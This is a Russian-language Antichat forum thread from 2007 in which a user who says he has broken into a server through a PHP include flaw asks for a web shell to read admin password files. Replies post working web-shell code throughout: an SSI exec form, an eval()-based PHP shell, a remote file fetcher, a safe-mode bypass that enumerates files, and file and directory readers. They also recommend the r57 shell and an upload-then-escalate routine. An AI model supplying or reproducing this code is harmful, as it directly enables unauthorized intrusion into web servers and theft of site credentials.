Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Нужен веб-шелл без использования system, passthru,exec,etc |
30.04.2007, 17:19
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Нужен веб-шелл без использования system, passthru,exec,etc
Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
Использовать сплойт для ядра пока что не хочу, а
Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please!
Последний раз редактировалось fastnull; 30.04.2007 в 17:42..
|
|
|
30.04.2007, 17:30
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
CODE
<html>
<body>
<script language="JavаScript">
<!--
function execute() {
var cmd = document.exec.cmd.value;
document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>');
}
//-->
</script>
<form name="exec">
<input type="text" name="cmd" size="20" value="">
<input type="submit" value="exec" onClick="execute()">
</form>
</body>
</html>
|
|
|
|
30.04.2007, 17:32
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>
|
|
|
|
30.04.2007, 17:47
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Сообщение от fly
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>
Спасибо! Приму к сведению! А есть ещё что-нибудь навороченное, с алиасами и всё-такое?
|
|
|
|
30.04.2007, 20:52
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Есть , но стоит денег! Поставь хоть +! 
Потыкай вот это еще
Код:
<?
"; echo ""; echo "
Root directory:
"; echo ""; echo "
------------------------------------
"; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKL MNOPQRSTUVWXYZ"; for($i=0; $i ";
foreach($D as $item) echo "{$item}\n";
echo "
"; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } ?>
|
|
|
|
01.05.2007, 06:27
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Сообщение от fly
Есть , но стоит денег! Поставь хоть +!
Потыкай вот это еще Дай бог тебе здоровья, парень!
|
|
|
|
01.05.2007, 06:35
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733
Репутация:
7
|
|
Сообщение от fly
Поставь хоть +! Слушай у меня такое подозрение, что новички с репой 0 не могут добавлять никому репутацию, но мы с тобой ещё сочтёмся, парень! 
|
|
|
|
01.05.2007, 15:54
|
|
Новичок
Регистрация: 03.12.2006
Сообщений: 16
Провел на форуме:
92377
Репутация:
2
|
|
PHP код:
<?php
$gpc=get_magic_quotes_gpc();
if (!empty($_POST['c'])) {
$c = $gpc?stripslashes($_POST['c']):$_POST['c'];
} else {
$c = NULL;
}
?>
<form action="" method="POST">
<textarea cols="80" rows="30" name="c" id="c"><?php echo $c;?></textarea>
<br />
<input type="submit"/>
</form>
<?php
if (!is_null($c)) eval($c);
?>
=========
Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться.
===========
Вот код для просмотра текущей директории:
PHP код:
$d = dir(".");
echo "Дескриптор: ".$d->handle."<br>\n";
echo "Путь: ".$d->path."<br>\n";
while (false !== ($entry = $d->read())) {
echo $entry."<br>\n";
}
$d->close();
=============
А вот для файла:
PHP код:
echo '<xmp>';
htmlspecialchars(readfile('file.php'));
echo '</xmp>';
-------------------------------------
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>
=================
Есть еще шелл, не использующий system:
http://php.spb.ru/remview/
Последний раз редактировалось SkyMan; 01.05.2007 в 16:04..
|
|
|
|
01.05.2007, 19:30
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти.
|
|
|
|
01.05.2007, 19:32
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Береги себя!!! Стучи 1-869-53два!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
